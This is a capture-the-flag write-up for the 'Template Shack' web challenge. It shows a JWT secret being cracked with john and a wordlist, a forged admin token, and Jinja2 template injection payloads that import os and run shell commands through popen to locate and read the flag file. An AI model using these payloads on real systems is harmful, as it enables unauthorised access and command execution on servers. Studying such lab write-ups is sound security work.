Tags: jinja web jinja2 template-injection hacktivityconctf2020
Rating:
## Write up Template Shack
On the website we got a session-token and token that seems to be a jwt:
to get the secret we have to bruteforce the jwt, using john:
``echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.9SvIFMTsXt2gYNRF9I0ZhRhLQViY-MN7VaUutz9NA9Y" > jwt.hash``
To crack it:
``john jwt.hash -w=/usr/share/wordlists/rockyou.txt``
we get the secret as ``supersecret``

Decoding it:

Now it's time to create a new token and sign it using the jwt_tool:

Using the tool to change guest for admin and sign it with the key:

Our brand new jwt token with "admin" ``eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.Ykqid4LTnSPZtoFb11H+/2q+Vo32g4mLpkEcajK0H7I``
changing the token with this value gives us access to de admin panel:

I noticed that inside the admin template when a webpage doesn't exists it renders the endpoint on the 404, for example if I look for /admin/abt.html I got:

This added to the name of the challenge made me think about template injection and bingo:

So there is probably python running on the backgroung as this is a feature of flask jinja so let's find it out with ``{{ [].__class__.__base__.__subclasses__() }}``:

So now we just need to use the os library to read the flag:
``{{ request.application.__globals__.__builtins__}}}`` we can access the builtins so we will try to import the os with ``{ request.application.__globals__.__builtins__.__import__('os')}}``

Its time to find the flag.txt ``{{ request.application.__globals__.__builtins__.__import__('os').popen('find / -name flag.txt').read()}}``

and finally cat the flag ``{{ request.application.__globals__.__builtins__.__import__('os').popen('cat /home/user/flag.txt').read()}}``

And that was all!